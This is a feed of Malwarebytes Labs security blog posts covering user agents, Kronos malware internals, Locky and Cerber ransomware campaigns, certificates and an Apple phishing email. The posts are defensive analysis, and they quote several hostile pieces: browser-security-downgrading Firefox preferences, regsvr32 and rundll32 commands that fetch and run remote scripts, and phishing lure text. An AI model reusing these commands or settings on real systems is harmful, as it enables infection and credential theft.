Techie Feeds

Explained: user agent

Malwarebytes - Tue, 08/22/2017 - 15:18

If you are the kind of person that uses different browsers or different devices to access websites, you may have noticed that many sites can look quite different depending on which browser you are using. When your browser sends a request to a website, it identifies itself with the user agent string before it retrieves the content you’ve requested. The data in the user agent string help the website to deliver the content in a format that suits your browser. Even though depending on user agents alone is no longer enough to optimize a website, they are still an important source of information.

How can I find mine?

If you want to check the user agent you are broadcasting to websites you visit, have a look here: Along with the user agent identification, the browser sends information about the device and the network that the user is on, like the IP address. That information is responsible for the first 3 lines of information on that site. But the 4th line is the one showing your user agent string. The strings can be confusing if you try to read them yourself. For example, for historical reasons, almost every web bbrowser identifies itself as a Mozilla browser.



Not only browsers utilize a user agent. The same is true for email clients and other programs that display website content. A very different type of user agent strings can be found that are in use by crawlers. This will grant access to certain parts of sites that are restricted for regular users, but on other sites the same crawler may be blocked as a whole.

For the breakdown we will concentrate on user agents that can be expected to be web browsers operated by humans. For these browsers the format of the user agent string is:

Mozilla/[version] ([system and browser information]) [platform] ([platform details]) [extensions]

Since Opera, who were the last to adapt to this standard, also started using the Mozilla user agent string, every popular browser uses this and will start the user agent string with Mozilla and the version number. Where Mozilla/5.0 is the latest version. The platform and platform details is where you can tell the difference between browsers. Some browser extensions are noted in the user agent string if they need certain content to be rendered in a specific way.

Is it a problem to give out this information?

To be honest, it’s a bigger problem not giving it away most of the times. Of course sites with malicious intentions can use this information to deliver specific exploits that have a bigger chance of working on your system. But there are more refined ways to do this, that get far more useful information. Also, it is not that hard to adapt your user agent string, so if you want to mislead the webserver that is not very hard either.

More information about the breakdown

Chrome User Agent explained, breaks down your user string and explains all the elements. Intended for Chrome, but it does explain big parts of other user agents as well.


Pieter Arntz

The post Explained: user agent appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (August 14 – August 20)

Malwarebytes - Mon, 08/21/2017 - 16:02

Last week, we gave some security tips for parents and kids aimed at the new school term. We also took a peek at the inside of the Kronos malware, focusing on how it works and protects itself. And, once again, we spotted a return of Locky ransomware with two new flavors at once, diablo6 and Lukitus.

Below are notable news stories and security-related happenings from last week:

Latest updates for Consumers Latest updates for Businesses


Safe surfing, everyone!

The Malwarebytes Labs Team

The post A week in security (August 14 – August 20) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Inside the Kronos malware – part 1

Malwarebytes - Fri, 08/18/2017 - 15:14

Recently, a researcher nicknamed MalwareTech famous from stopping the WannaCry ransomware got arrested for his alleged contribution to creating the Kronos banking malware. We are still not having a clear picture whether the allegations are true or not – but let’s have a look at Kronos itself.


This malware has been first advertised on the black market since around June 2014, by an individual nicknamed VinnyK, writing in Russian:


The full text of the advertisement, translated into English, has been included in the IBM’s Security Intelligence article.

We found Kronos being spread by various exploit kits, i.e. Sundown (more information here). The malware is being distributed up to now – some of the recent samples have been captured about a month ago, dropped from Rig EK.

Nowadays, Kronos is often used for the purpose of downloading other malware. One of the campaigns using Kronos as a downloader was described by Proofpoint.

Analyzed samples

Samples from 2014:

Sample #1 (from 2016)

Sample #2 (from 2017):

Behavioral analysis

After being run, Kronos installs itself in a new folder (%APPDATA%/Microsoft/[machine-specific GUID]):

The dropped sample has a hidden attribute.

Persistence is achieved with the help of a simple Run key:

At the beginning of the execution, the malware modifies the Firefox profile, overwriting user.js with the following content:

user_pref("network.cookie.cookieBehavior", 0); user_pref("privacy.clearOnShutdown.cookies", false); user_pref("security.warn_viewing_mixed", false); user_pref("security.warn_viewing_mixed.show_once", false); user_pref("security.warn_submit_insecure", false); user_pref("security.warn_submit_insecure.show_once", false); user_pref("", false); user_pref("browser.safebrowsing.enabled", false); user_pref("network.http.spdy.enabled", false); user_pref("network.http.spdy.enabled.v3", false); user_pref("network.http.spdy.enabled.v3-1", false); user_pref("network.http.spdy.allow-push", false); user_pref("network.http.spdy.coalesce-hostnames", false); user_pref("network.http.spdy.enabled.deps", false); user_pref("network.http.spdy.enabled.http2", false); user_pref("network.http.spdy.enabled.http2draft", false); user_pref("network.http.spdy.enforce-tls-profile", false); user_pref("security.csp.enable", false);

The new settings are supposed to give to the malware more control over the browser’s behavior and downgrade the security settings. Then, the malware injects itself into svchost, and continues running from there. We can find it listening on local sockets.

It is worth noting, that Kronos deploys a simple userland rootkit, that hides the infected process from the monitoring tools. So, the process running the main module may not be visible. The rootkit is, however, not implemented in a very reliable way, and the effect of hiding does not always work.

Whenever some browser is deployed. Kronos injects its module there and connects with the main module, that runs inside the svchost process. Looking at the TCP connections established by the particular processes (i.e. using ProcessExplorer), we can see that a browser is paired with the infected svchost:

This trick is often used by banking trojans for the purpose of stealing data from the browser. The module injected in the browser hooks the used API and steals the data. After that, it sends this data to the main module that process it further, and reports to the CnC.

Network communication

The analyzed sample was connecting to CnCs at two addresses:

At the time of analysis, each CnC was dead (sinkholed), but still, we could spot some patterns typical for this malware family.

First, the malware sends a beacon that is 74 bytes long:

Then, follows another chunk of data:

In both cases, we can see that the requests are obfuscated by XOR with a random character. This is how the beacon looks after being XOR-decoded:

We can see that all the requests start from the same header, including the GUID specific to the infected machine.

Detailed research about decrypting Kronos communication has been already described here.

Inside Interesting strings

Like most malware, Kronos is distributed packed by various packers/crypters. After unpacking the first layer, we get the malicious payload. We can easily identify Kronos by the typical strings used:

There are more strings that are typical for this particular malware:

Those strings are hashes used to dynamically load particular imported functions. Malware authors use this method to obfuscate used API functions, and by this way, hide the real mission of their tool. Instead of loading function using its explicit name, they enumerate all imports in a particular DLL, calculate hashes of their names, and if the hash matches the hardcoded one, they load that function.

Although the approach is common, the implementation seen in Kronos is not typical. Most malware stores hashes in the form of DWORDs, while Kronos stores them as strings.

Inside the early samples of Kronos, we can find a path to the debug symbols, revealing the structure of directories on the machine where the code was built. The following path was extracted from one of the Kronos samples observed in wild (01901882c4c01625fd2eeecdd7e6745a):


The PDB path can be also found in the DLL (6c64c708ebe14c9675813bf38bc071cf) that belongs to the release of Kronos from 2014:


This module, injlib-client.dll, is the part injected into browsers. In the newer version of Kronos, analogical DLL can be found, however, the PDB path is removed.

Injection into svchost

The main module of Kronos injects itself into svchost (version from 2014 injects into explorer instead). In order to achieve this initial injection, the malware uses a known technique, involving the following steps:

  1. creates the svchost process as suspended
  2. maps its sections into its own address space
  3. modifies the sections, adding its own code and patching the entry point in order to redirect the execution there
  4. resumes the suspended process, letting the injected code execute

Below, you can see the memory inside the infected svchost (in early versions, the injection was targeting explorer). The malware is added in a new, virtual section – in the given example, mapped as 0x70000:

This is how the patched entry point of svchost looks like – as we can see, execution is redirected to the address that lies inside the added section (injected malware):

The execution of the injected PE file starts in a different function now – at RVA 0x11AB0:

– while the original Entry Point of the malware was at RVA 0x12F22:

The malware defends itself from the analysis, and in the case of the VM or debugger being detected, the sample will crash soon after the injection.

Running sample from new Entry Point

The main operations of the malware starts inside the injected module. This is how the new Entry Point looks like:

The main function is responsible for loading all the imports and then deploying the malicious actions.

If you are an analyst trying to run Kronos from that point of the execution, below you will find some tips.

The first block of the function is responsible for filling the import table of the injected module. If we want to run the sample from that point, rather than following it when it is injected, there are some important things to notice. First of all, the loader is supposed to fill some variables inside the injected executable, i.e. the variable module_base. Other functions will refer to this, so, if it does not contain the valid value, the sample will crash. Also, the functions filling the imports expects that the section .rdata (containing the chunks to be filled), is set as writable. It will be set as writable in the case when the sample is injected because then, the full PE is mapped in a memory region with RWX (read-write-execute) access rights. However, in the normal case – when the sample is run from the disk – it is not. That’s why, in order to pass this stage, we need to change the access rights to the section manually.

Another option is to run Kronos sample starting from the next block of the main function. This also leads to successful execution, because in case if the sample is run from the disk rather than injected, imports are filled by windows loader and doing it manually is just redundant.

The last issue to bypass is the defensive check, described below.

Defensive tricks

The malware deploys defense by making several environment checks. The checks are pretty standard – searching blacklisted processes, modules etc. The particular series of checks are called from inside one function, and results are stored as flags set in a dedicated variable:

If the debugger/VM is detected, the variable has a non-zero value. Further, the positive result of this check is used to make the malware crash, interrupting the analysis.

The crash is implemented by taking an execution path inappropriate to the architecture where the sample was deployed. The malware is a 32 bit PE file, but it has a bit different execution paths, depending if it is deployed on 32 or 64-bit system. First, the malware fingerprints the system and sets the flag indicating the architecture:

DWORD is_system64_bit() { DWORD flag = 0; __asm { xor eax, eax mov ax, cs shr eax, 5 mov flag, eax }; return flag; }

This trick uses observations about typical values of CS registry on different versions of Windows (more information here). It is worth to note, that it covers most but not all the cases, and due to this on some versions of Windows the malware may not run properly.
If the debugger/VM is detected, the flag indicating the architecture is being flipped:

That’s why the sample crashes on the next occasion when the architecture-specific path of execution should be taken.

For example, if the sample is deployed on 64-bit machine, under Wow64, the syscall can be performed by using the address pointed by FS:[0xC0]. But if the malware runs on a 32-bit machine, the value pointed by FS:[0xC0] will be NULL, thus, calling it crashes the sample.

This way of interrupting analysis is smart – sample does not exit immediately after the VM/debugger is detected, and it makes it harder to find out what was the reason of the crash.

Using raw syscalls

As mentioned in the previous paragraph, Kronos uses raw syscalls. Syscall basically means an interface that allows calling some function implemented by kernel from the user mode. Applications usually use them via API exported by system DLLs (detailed explanation you can find i.e. on EvilSocket’s blog).

Those API calls can be easily tapped by monitoring tools. That’s why, some malware, for the sake of being stealthier reads the syscalls numbers from the appropriate DLLs, and calls them by it’s own code, without using the DLL as a proxy. This trick has been used i.e. by Floki bot.

Let’s have a look how is it implemented in Kronos. First, it fetches appropriate numbers of the syscalls from the system DLLs. As mentioned before, functions are identified by hashes of their names (full mapping hash-to-function you can find in Lexsi report).

For example:

B6F6X4A8R5D3A7C6 -> NtQuerySystemInformation

The numbers of syscalls are stored in variables, xored with a constant. Fragment of the code responsible for extracting raw syscalls from the DLL:

In order to use them further, for every used syscall Kronos implements its own wrapper function with an appropriate number of parameters. You can see an example below:

The EAX registry contains the number of the syscall. In the given example, it represents the following function:

00000105 -> NtQuerySystemInformation

Kronos uses raw syscalls to call the functions that are related to injections to other processes because they usually trigger alerts. Functions that are called by this way are listed below:

NtAllocateVirtualMemory NtCreateFile NtCreateSection NtGetContextThread NtOpenProcess NtProtectVirtualMemory NtQueryInformationProcess NtQuerySystemInformation NtResumeThread NtSetContextThread NtSetValueKey

It matches the black market advertisement, stating: “The Trojan uses an undetected injection method” (source).

Rootkit and the hooking engine

One of the features that malware provides is a userland rootkit. Kronos hooks API of the processes so that they will not be able to notice its presence. The hooking is done by a specially crafted block of the shellcode, that is implanted in each accessible running process.

First, Kronos prepares the block of shellcode to be implanted. It fills all the necessary data: addresses of functions that are going to be used, and the data specific to the malware installation, that is intended to be hidden.

Then, it searches through the running processes and tries to make injection wherever it is possible. Interestingly, explorer.exe and chrome.exe are omitted:

The shellcode is deployed in a new thread within the infected process:

Below you can see the shellocode inside the memory of the infected process:

When it runs, it hooks the following functions in the address space of the infected process:

ZwCreateFile NtOpenFile ZwQueryDirectoryFile NtEnumerateValueKey RtlGetNativeSystemInformation NtSetValueKey ZwDeleteValueKey ZwQueryValueKey NtOpenProcess

The interesting thing about this part of Kronos is its similarity with a hooking engine described by MalwareTech on his blog in January 2015. Later, he complained in his tweet, that cybercriminals stolen and adopted his code. Looking at the hooking engine of Kronos we can see a big overlap, that made us suspect that this part of Kronos could be indeed based on his ideas. However, it turned out that this technique was described much earlier (i.e. here, //thanks to  @xorsthings for the link ), and both authors learned it from other sources rather than inventing it.

Let’s have a look at the technique itself. During hooking, one may experience concurrency issues. If a half-overwritten function will start to be used by another thread, the application will crash. To avoid this, it is best to install a hook by a single assembly instruction. MalwareTech’s engine used for this purpose an instruction lock cmpxch8b. Similar implementation can be found in Kronos.

The hooking function used by Kronos takes two parameters – the address of the function to be hooked, and the address of function used as a proxy. This is the fragment of the implanted shellcode where the hooking function is being called:

First, the hooking function searches the suitable place in the code of the attacked function, where the hook can be installed:

The above code is an equivalent of the following:

Then, it installs the hook:

As we can see, the used method of  installing hook is almost identical to:

Below you can see an example of Kronos hooking a function ZwResumeThread in the memory of the attacked process. Instruction lock cmxch8b is indeed used to overwrite the function’s beginning:

After the hook installation, whenever the infected process calls the hooked function, the execution is redirected to the proxy code inside the malicious module:

The hooking engine used in Kronos is overall more sophisticated. First of all, even the fact that it is a shellcode not a PE file makes a difficulty level of implementing it higher. The author must have taken care of filling all the functions addresses by his own. But also, the author of Kronos shown some more experience in predicting possible real-life scenarios. For example, he took additional care for checking if the code was not already hooked (i.e. by other Trojans or monitoring tools):

Attacking browsers

The malware injects into a browser an additional module (injlib-client.dll). Below we can see an example of the DLL injected into Firefox address space:

The malware starts the injected module with the help of the injected shellcode:

We can see some API redirections added by the malware. Some of the functions imported by the attacked browser are hooked so that all the data that passes through them is tapped by the Kronos module.

The data that is being grabbed using the hooked browser API is then sent to the main module, that is coordinating malware’s work and reporting to the CnC server.


An overall look at the tricks used by Kronos shows that the author has a prior knowledge in implementing malware solutions. The code is well obfuscated, and also uses various tricks that requires understanding of some low-level workings of the operating system. The author not only used interesting tricks, but also connected them together in a logical and fitting way. The level of precision lead us to the hypothesis, that Kronos is the work of a mature developer, rather than an experimenting youngster.


Overview of the Kronos banking malware rootkit” by Lexsi

Decrypting the configuration

This was a guest post written by Hasherezade, an independent researcher and programmer with a strong interest in InfoSec. She loves going in details about malware and sharing threat information with the community. Check her out on Twitter @hasherezade and her personal blog:

The post Inside the Kronos malware – part 1 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Locky ransomware returns to the game with two new flavors

Malwarebytes - Wed, 08/16/2017 - 17:57

We recently observed a fresh malicious spam campaign pushed through the Necurs botnet distributing so far, two new variants of Locky ransomware.

In our last Q2 2017 report on tactics and techniques, we mentioned that Locky ransomware had reappeared with a new extension, but went dark again for months.

From August 9th, Locky made another reappearance using a new file extension “.diablo6” to encrypt files with the rescue note: “diablo6-[random].htm“.

Today a new Locky malspam campaign is pushing a new Locky variant that adds the extension “.Lukitus” and the rescue note: “lukitus.html“.

Locky, like numerous other ransomware variants, is usually distributed with the help of spam emails containing a malicious Microsoft Office file or a ZIP attachment containing a malicious script.

Locky variants, callback to a different command and control server (C2) and use the affiliate id: AffilID3 and AffilID5.

Over the last few months, Locky has drastically decreased its distribution, even failed to be distributed at all, then popped back up again, vanished and reappeared once more.

The ups and downs of Locky remain shrouded in mystery. One thing time has taught us is that we should never assume Locky is gone simply because it’s not active at a particular given time.

Locky extension history Active Campaigns:
  • Aug-09: MalSpam attached .zip with .vbs malware. VBS: 4c1975295603dbb3994627a499416b71 Payload: 0d0823d9a5d000b80e27090754f59ee5
  • Aug-11: MalSpam attached PDF with embedded .DOCM files. PDF: 84fd7ba91a587cbf8e20d0f2d5fda285 DOC: 97414e16331df438b2d7da0dad75a8d5 Payload: 9dcdfbb3e8e4020e4cf2fc77e86daa76
  • Aug-14: MalSpam attached RAR with .JS malware. JS: badea58f10d5d2bb242962e3c47ff472 Exe: 6b4221adf0ecb55cd1a4810330b4e1e4
  • Aug-15: MalSpam attached ZIP with .JS malware. JS: 5f1af4f2702a6bc7f5250c9879487f66 Exe: 89ed8780cae257293f610817d6bf1a2e
  • Aug-16: MalSpam attached ZIP with .JS malware. JS: f2c97bd1793ff93073bfde61d12f482b Exe: 4baa57a08c90b78d16c634c22385a748

Malwarebytes protects against this attack at various layers including macro and ransomware mitigation, and neither of those required any signature update.

Click to view slideshow.

The post Locky ransomware returns to the game with two new flavors appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Week in Security (August 7 – August 13)

Malwarebytes - Mon, 08/14/2017 - 19:51

Last week, we explained how security certificates work and how malware authors have used them to block security software from being downloaded and executed. We also showed how the Magnitude exploit kit is spreading a Cerber ransomware variant that uses binary padding in an attempt to get skipped, because of its file size, during antivirus scans.

Latest updates for Businesses
  • Password rules have been way too complicated says the man that invented those rules and regrets it. These rules have now been updated.
  • Locky made another comeback (maybe we should call it Rocky), this time using the diablo6 extension.
  • And another ransomware that came back is the disk-encrypting Mamba.
  • Microsoft and Kaspersky seem to get closer to burying the hatchet concerning the claim by the Russian anti-virus company that the US software giant was unfairly promoting the use of Windows Defender over third-party security products.
  • Salesforce fired two of its senior security engineers after their talk at DEF CON. Or actually told them up front that they would be fired if they went ahead with the talk. Which they did as they didn’t see that text message on time.
Latest updates for Consumers
  • A document was leaked that discloses CouchPotato, which is how the CIA uses a remote tool to stealthy collect RTSP/H.264 video streams.
  • After the leak of some Game of Throne episodes by HBO hackers earlier in the week, there was a bigger data dump this weekend, including episodes of Insecure, Ballers, Barry, The Deuce, a comedy special and other programming.
  • Google brings phishing protection to iOS. A few months after releasing the anti-phishing feature for Android, Google now does the same for iOS. Google : “Going forward, when you click on a suspicious link in a Gmail message on your iPhone or iPad, we’ll show a warning. We recommend that you use caution before proceeding, because the link is likely unsafe. Only proceed if you’re confident there’s no risk.”
 In other security news:

Safe surfing, everyone!

The Malwarebytes Labs Team

The post Week in Security (August 7 – August 13) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Back to school cybersecurity tips for parents and kids

Malwarebytes - Mon, 08/14/2017 - 16:35

The time to start the new school term is just around the corner. And for parents, the excitement and anxiety may be palpable, especially if it’s their kid’s first time attending a new school. Ads for back-to-school gear start as early as July, increasing in frequency and urgency until the kiddos step foot on the bus. And while they may not be begging you for new pencils and erasers, chances are they’ll turn on the puppy dog–eyed charm when it comes to new tech.

Handing your young one their very own mobile device—a laptop, usually—that they can use in their studies almost seems like a rite of passage. In their hands is the first step toward independence. It’s also a way of letting them take on some responsibilities for themselves. Parents, this isn’t to say we’re leaving them entirely to their own devices. It’s important to lay down some ground rules—especially when it comes to security.

To that effect, we’re providing you with a cybersecurity checklist you can use to prepare your children for the coming school year.

  • Watch out for too-good-to-be-true software and device sales. Is that Facebook ad really promising a brand-new Mac laptop for $200 if you just click here and fill out your personal info? Think hard before you jump on a back-to-school online ad that seems fiendishly cheap. It could be adware, it could be a scam, or it could lead you to a malicious page that will later infect your own computer.
  • Ensure that they have security software and tools installed on their new device. Antivirus with anti-phishing features, firewalls, script blockers, ad blockers, password managers, anti-theft apps, anti-malware and ransomware—you name it. Cyberattacks can come from all sides these days, so it pays to have at least one of each of these software programs and/or extensions installed on their computer, phone, or tablet. And if you think your child’s Mac is bulletproof from these attacks, think again.
  • Stress the importance of physical security, too. Physically securing devices is just as important as securing the data inside of them. We’re not just talking about using a padded bag for laptops, or shock-absorbent cases and shatterproof screen covers for phones and tablets. We’re talking about locking cables and USB port blockers, actual things that thwart theft and unauthorized access, respectively, while they’re in school.
  • Instill in them the habit of locking computers when they have to move away from them for a while. Locking screens is another way to prevent others from, say, flipping your child’s screen upside down, snooping around, and looking at files they shouldn’t be looking at. Beware the “hacked” social media posts that reveal false, embarrassing information about their users!
  • Disable the autorun functionality of their OS. As you may know, malware can be stored in and transported via USB sticks. If your child’s computer automatically runs what’s inside it once slotted into the machine’s port, then this is a real problem. Thankfully, there are a number of ways one can disable autorun. For Windows users, Microsoft has dedicated a page just for that.
  • Introduce them to multi-factor authentication (MFA). The most common and widely used MFA is two-factor authentication (2FA). In order for them to know and understand what it is, you might show them how it works using your own phone and computer. That way, if they are asked to sign up for online programs that store their data at school, they can raise their hand and ask if the program has MFA. By educating your child on this security procedure, he or she can educate the school in turn.
  • Discourage rooting/jailbreaking. If your child is old enough to figure out how to root or jailbreak a device, chances are they’ll probably be tempted to do this. Jailbreaking opens devices to custom modifications and the unrestricted download and use of apps from third-party sources. These can be quite handy if your child wants one that cannot be found in the official app store. However, jailbreaking and rooting increases the success rate of a hacking attempt, as these overwrite the device’s inherent security settings, making devices more vulnerable and susceptible to threats.
  • Update game console firmware. All work and no play makes Jack a dull boy. Isn’t your little gamer glad that back-to-school gadgets are not limited to calculators, headphones, and keyboards? Gaming consoles are becoming more like computers as they evolve. Although it’s rare for them to catch malware (at least for the time being), there are still ways hackers can circumvent their security to perform other malicious acts, such as gaining access to gaming accounts. So for now, update the gaming console’s firmware—and do this on a regular basis—before handing it to your child.

Youngsters should also play a part in securing their computing devices and protecting data. An important and particularly relevant piece of knowledge is basic computer hygiene, which might come in even more handy than algebra. Here are a few more cybersecurity tips to include in your child’s expanding mental knowledge base.

  • Ask your children to familiarize themselves with the school’s Information and Communication Technology (ICT) Acceptable Use Policy (AUP). If at this point you’ve glazed over, we understand. An ICT AUP is generally a set of rules the schools (and organizations) enforce for the proper use of the Internet. It’s for staff and students alike, so they must agree to this before they can use the school’s network. Unfortunately, many educational establishments don’t have such a policy, but if theirs does—great! Get your child acquainted with it so they can be sure they won’t be called out for misusing resources.
  • Talk to them about shoulder surfers. Some say it’s only normal for people to glance over your shoulder while you’re on your laptop, tablet, or phone. But let us not be too quick in giving this behavior a pass. Shoulder surfing is a serious security and privacy risk, and a lot of users may be in danger of compromise by unknowingly letting the person behind them watch as they key in their account password with their user name in full view.
  • Learn about encryption. The availability of information and today’s technology has made it possible for anyone, even young children, to learn about encryption. Suffice it to say—yes, there’s an app for that.

Many families have back-to-school preparation routines. From purchasing new clothes and gear to adjusting back to a more rigid activity and sleep schedule. Make learning about basic computer hygiene and securing devices a part of yours.

The post Back to school cybersecurity tips for parents and kids appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Cerber ransomware delivered in format of a different order of Magnitude

Malwarebytes - Wed, 08/09/2017 - 15:54

As a follow up to our study into the Magnitude exploit kit and its gate (which we profiled in a previous blog post), we take a look at an interesting technique used to distribute the Cerber ransomware.

Exploit kits are a very effective means of serving malicious payloads and an important aspect is the delivery mechanism in itself. The typical scenario is for the exploit code to download a payload to disk and then run it. But there are exceptions which we have witnessed in the past:

There may be different motivations behind such deviations from the standard drive-by download methodology, but typically the goal is to evade antivirus scanners/signatures by adopting a less common behaviour.

Today, we take a look at yet another technique which has been used by Magnitude EK where the payload is largely inflated before it is run.


The Magnitude exploit kit has been using an XML configuration file critical to retrieving the malware payload (Cerber) for several months already, and some researchers have run into it before [1] [2] [3].

Around the end of July – according to our captures – we spotted a new for loop which assigns a variable that is being concatenated. This piece of code adds ‘junk’ to the existing Cerber binary on-the-fly, to grow its initial size from say, 245 KB*, to anywhere between 70 to 100 MB*.

Figure 1: Workflow from Magnitude EK to Cerber infection via larger malicious binary

* these numbers are from a specific capture and will vary based on changes made to Magnitude EK

This is not a bug, but rather, as they say, “a feature” which allows to bypass security products that have a hard limit on file sizes they can scan. In the rest of this post, we will describe how this process known as binary padding is implemented in Magnitude EK.

Delivery chain

Magnitude EK is notorious for distributing the Cerber ransomware specifically to certain geolocations, and in particular South Korea, via its own gate, called Magnigate. For a while, we have noticed that Magnitude EK has been using Internet Explorer vulnerabilities without necessarily resorting to Flash exploits. Another interesting artifact part of the EK flow is the use of an XML configuration file which contains JScript code.

Figure 2: Network traffic view showing the EK’s main artifacts

XML Configuration

In prior instances of Magnitude EK, regsvr32.exe was used to retrieve and execute the binary payload (without any size modification) using the scriptlet passed as a URL parameter. Originally, we saw the payload being launched from the %temp% folder but sometime in mid-July it also ran from the Desktop (perhaps a transition?):

“C:\Windows\System32\regsvr32.exe” scrobj.dll /s /u /n /i:

On July 31st, we noticed rundll32.exe with a different looking command still parsing the remote scriptlet:

Figure 3: From browser exploit to malicious JScript via rundll32

“C:\Windows\System32\rundll32.exe” javascript:”\..\mshtml,RunHTMLApplication “;document.write();GetObject(‘script:‘);

Figure 4: The XML config, showing the embedded JScript

Binary padding

The purpose of this script is to retrieve the original Cerber payload (245 KB) and add data (95 MB) to it via a technique known as binary padding. The Shell aplication uses ADODB.Stream to save “text” data (N4mQj8624F9Npw10s61F) with a particular charset (iso-8859-1) used for text to binary data conversion.

The reason this data amounts to 95 MB is because it concatenates that string via a loop 14 times, which is the equivalent of writing “N4mQj8624F9Npw10s61F” 4,782,969 million times (3^14) and saving it to a file.

Figure 5: Crafting the inflated binary by appending a text string millions of times

rundll32.exe downloads the original Cerber and adds the junk data on the fly:

Figure 6: Process view showing data being written to the new, inflated Cerber binary

Figure 7: Hexadecimal view of the final binary, showing the added ‘junk’ data

Finally, it runs it:

Figure 8: The new Cerber binary is invoked via rundll32

A few seconds later, Cerber has encrypted files and displays the ransom note:

Figure 9: Wallpaper hijack shows the ransom note

Tricks of the trade

While Magnitude EK has a very narrow distribution channel, it remains an interesting exploit kit because not only does it have its own gate, but it also continues to evolve with various tricks. The binary padding technique shows an effort to bypass certain security scanners that will ignore files above a certain size. However, this does not prevent the malicious binary (no matter how big) to run its course and fully infect a machine.


The key to protecting against these kinds of attacks is to block threats regardless of the shape they come as and thwart them as early as possible in the delivery chain. Malwarebytes stops Magnitude EK proactively using its anti-exploit module before the malicious payload is even downloaded. As an added protection layer, our anti-ransomware component also stops this ‘larger than usual’ Cerber.

Figure 10: Malwarebytes blocking the Magnitude exploit kit in its drive-by download attempt

Figure 11: Malwarebytes (other protection modules disabled for testing) stopping the ransomware infection





Indicators of compromise

Magnitude EK,,Magnigate (step 1),,Magnigate (step 2),,Magnitude EK Landing,,Magnitude XML/JScript,,Cerber (original)

Cerber (original)


Cerber (inflated)


The post Cerber ransomware delivered in format of a different order of Magnitude appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Explained: security certificates

Malwarebytes - Tue, 08/08/2017 - 18:17

As a result of my PowerShell series [1],[2],[3], where I used the handling of certificates as an example, mainly because I wanted a method to keep track easier of which certificates were being added by malware, I’ve have received some questions about how security certificates work and how they stopped our software from working.

First, it helps to take a look at your own certificates. Go ahead and open the Microsoft Certificates Management Console. You can do this by typing certmgr.msc in the search field of your start button. You will have to do this as an administrator of the system.

You should see an overview of your certificates divided up into categories. The most used and usually the most important categories are Trusted Root Certification Authorities and Untrusted Certificates.

What are these certificates?

Root certificates are a method to prove that a communication you are receiving (from a website, by mail, or otherwise) comes from the source that it claims to be. This is done by public key encryption to establish a trust between the holders of the public and the private keys. But since it would be impossible to store certificates for every site we’ve ever visited or wish to visit, the system of certificate authorities (CA) was set up. To establish trust that a certificate is genuine, it is digitally signed by a root certificate belonging to a trusted certificate authority. Operating systems and browsers maintain lists of trusted CA root certificates so they can easily verify that they have been issued and signed.

You may have seen prompts warning you about a website’s security certificate, or as in the example below, a mismatch between the certificate and the name of the site:

The image shows which checks have been made before allowing a free exchange of information:

  • Can we trust the source of the certificate?
  • Is the certificate still valid? They all have a starting and an expiration date.
  • Is the name valid, and does the name on the certificate match the name on the site’s certificate?
  • Is the signature strong enough?

Another important check needs to be done, however. Has the certificate been revoked? Sometimes the CA revoke certificates, mainly because the certificate, or the private key, has been stolen or compromised. This check is made against the Certificate Revocation List (CRL), which is a system that unfortunately has some flaws, meaning sometimes the check is not completed.

Untrusted certificates

As we have seen in the past, certain types of malware place certificates in the Untrusted category, which basically disables users from downloading and using security software to remove the malware. Below you can see that the Malwarebytes certificate was placed in the Untrusted category by the Wdfload malware.


This certificate, however, has nothing to do with our website. Instead, it’s associated with our software. With the certificate above in the Untrusted category, this is what you will see if you try to run our software.

Even though the CA (DigiCert) did not revoke our certificate and can still be found under our Trusted Root Certification Authorities, the Malwarebytes certificate was listed as revoked by the malware. We have to remove the certificate shown above from the Untrusted category before we can use the software again.

So there you have it: a brief explanation of how security certificates work and how malware can abuse the certificates system to block you from downloading and/or running your favorite software.

The post Explained: security certificates appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (July 31 – August 6)

Malwarebytes - Mon, 08/07/2017 - 19:19

Last week we explored some basic PowerShell commands, dived into the new methods used by TrickBot, and wrote at length about the Magnitude exploit kit redirection chain. Our teams were busy at both BlackHat and DefCon, and outside of those famous hallways, we also took time to fire up some basic PowerShell programs.

Naturally the two big security events have consumed most of the column inches this past week, but even so there’s still a couple of notable security stories floating around.

Latest updates for Consumers

WannaCrypt victims paid out over $140k in Bitcoin to get files unscrambled: Victims of Ransomware continue to pay the price (source: The Register)

Web Developer for Chrome compromised: A timeline of how a Chrome extension was taken over by bad actors (source: Blog on Chris Pederick)

iOS users beware: You’re the biggest target for mobile phishing attacks: Keep a close eye on your trusty Apple devices (source: TechRepublic)

Nigerian man charged in US phishing scam: Contrary to popular belief, sometimes the phishers do get brought to justice (source: VOA News)

Divorce, wiretapping, and email: This domestic fallout has it all (source: The Register)

Stay safe, everyone!

Malwarebytes Lab Team

The post A week in security (July 31 – August 6) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Apple phish: Summary report statement

Malwarebytes - Mon, 08/07/2017 - 15:30

If the following message lands in your mailbox, you may wish to throw on your “This is highly suspicious” cap before proceeding further:


The email is titled

RE: [ Summary Report ] Statement login and update account 08/05/2017

Note the old spammer trick of placing “RE:” at the start to make you think there’s some sort of correspondence taking place.

Spoiler: there isn’t.

The message reads as follows:

Apple ID
Account Information Page

We need your help resolving an issue with your account. Thus, we have temporarily lock your account.

We understant it may be frustating not to have full access to your account.

We want to work with you to get your account back to normal as quickly as possible.

How can you help?

It’s usually quite straight forward to take care of these things. Most of time, we just need some more information about your account.

Please complete your account informations by clicking in the link below.

Confirm My Account
We will permanently lock your account if we don’t receive your verification within 24 hours.


Apple Support

The URL used is a Goo(dot)gl shortener (now deactivated), which was bouncing users to the final destination below located at


Entering an Apple ID and password results in the following (fake) message that the account has been locked:

We’ve noticed significant changes in your account activity. For your protection, we’ve disable [SIC] your account.

Unlock account

The next page asks for a lot of personal information, including: name, address, DOB, phone number, full card information, security question information, and even 3D secure details.

This is not something you want to hand your details over to. This site joins the ranks of phishing pages making use of HTTPs to appear more authentic – here’s the real Apple sign in page:

You’ll notice it mentions the company name. This is called an Extended Validation certificate. The one being used on the phish page claims to be from a service offering free certs to those possessing a web domain.

A good example of why you shouldn’t just believe the site in front of you is legit, purely because there’s HTTPs going on in the background. Emails directing you to pages asking for payment info via embedded links should set off all the warning alarms – and this particular email and website combo should be forever banished to your “ignore forever” folder.

Christopher Boyd

The post Apple phish: Summary report statement appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Learning PowerShell: basic programs

